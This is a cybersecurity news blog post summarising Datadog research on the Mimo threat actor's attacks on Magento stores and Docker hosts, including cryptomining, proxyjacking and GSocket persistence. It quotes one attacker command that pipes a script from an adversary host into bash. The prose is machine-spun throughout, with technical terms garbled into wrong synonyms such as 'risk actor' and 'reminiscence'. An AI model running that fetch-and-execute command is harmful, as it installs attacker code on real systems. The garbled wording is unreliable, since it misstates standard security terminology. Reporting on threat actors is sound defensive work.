Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Threat Actor Mimo Attacking Magento CMS to Steal Card Details and Bandwidth Monetization

Posted on July 24, 2025July 24, 2025 By CWS

The cybersecurity panorama faces a brand new risk because the infamous Mimo risk actor, beforehand identified for focusing on Craft content material administration programs, has considerably advanced its operations to compromise Magento ecommerce platforms.

This growth represents a harmful shift towards high-value targets the place monetary knowledge info are routinely processed, marking a regarding escalation within the group’s felony actions.

Mimo’s newest marketing campaign demonstrates subtle technical capabilities, exploiting undetermined PHP-FPM vulnerabilities to achieve preliminary entry to Magento installations.

The risk actor has developed a multi-pronged monetization technique that mixes conventional cryptocurrency mining with bandwidth theft via residential proxy networks.

This twin strategy permits the attackers to extract most worth from compromised programs whereas sustaining persistent entry to precious ecommerce environments.

DATADOG Safety Labs researchers recognized this evolution throughout investigations into a number of workload compromises affecting ecommerce websites all through 2025.

The safety crew found that Mimo had not solely expanded its goal scope however had additionally launched superior persistence mechanisms and complex evasion methods that considerably improve the risk’s operational safety and longevity on compromised programs.

The risk actor’s operations lengthen past Magento platforms, with researchers uncovering proof of Docker container compromises via misconfigured Docker Engine API endpoints.

Mimo Exploitation (Supply – DATADOG Safety Labs)

When focusing on Docker environments, Mimo employs the command curl http://[adversary-controlled-infrastructure]/cron.jpg?docker | bash to provoke the an infection chain, demonstrating the group’s adaptability throughout various infrastructure sorts.

Superior Persistence and Evasion Mechanisms

Mimo’s most important tactical development entails implementing GSocket, a reputable penetration testing device, for establishing persistent command and management channels.

This device permits encrypted communication via the World Socket Relay Community utilizing AES-256-CBC encryption, successfully bypassing firewalls and community tackle translation boundaries that may usually block malicious visitors.

The malware employs subtle course of masquerading methods, choosing random names from a hardcoded record together with [kstrp], [watchdogd], [ksmd], and [kswapd0] to mix seamlessly with reputable kernel processes.

Maybe most regarding is Mimo’s implementation of the memfd_create() syscall, which creates nameless momentary information immediately in reminiscence, permitting the malware to execute fully with out leaving conventional filesystem artifacts that safety instruments usually monitor.

Enhance detection, cut back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Strive ANY.RUN Now

Cyber Security News Tags:Actor, Attacking, Bandwidth, Card, CMS, Details, Magento, Mimo, Monetization, Steal, Threat

Post navigation

Previous Post: Hackers Deploy Stealth Backdoor in WordPress Mu-Plugins to Maintain Admin Access
Next Post: Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cybercrime Marketplace

Related Posts

Threat Actors Exploiting Ivanti Connect Secure Vulnerabilities to Deploy Cobalt Strike Beacon Cyber Security News
WinRAR Directory Vulnerability Let Execute Arbitrary Code Using a Malicious File Cyber Security News
Pakistani Actors Built 300+ Cracking Websites Used to Deliver Info-Stealer Malware Cyber Security News
Zero Trust Architecture Building Resilient Defenses for 2025 Cyber Security News
Kali Linux Unveils Two New Tools to Boost Wi-Fi Performance for Raspberry Pi Users Cyber Security News
Threat Actors Attacking Cryptocurrency and Blockchain Developers with Weaponized npm and PyPI Packages Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • How to Report a Stolen Identity
  • Web-to-App Funnels: Pros And Cons
  • Microsoft 365 Admin Center Outage Blocks Access for Admins Worldwide
  • 10 Best API Monitoring Tools in 2025
  • U.S. Sanctions Firm Behind N. Korean IT Scheme; Arizona Woman Jailed for Running Laptop Farm

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • How to Report a Stolen Identity
  • Web-to-App Funnels: Pros And Cons
  • Microsoft 365 Admin Center Outage Blocks Access for Admins Worldwide
  • 10 Best API Monitoring Tools in 2025
  • U.S. Sanctions Firm Behind N. Korean IT Scheme; Arizona Woman Jailed for Running Laptop Farm

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News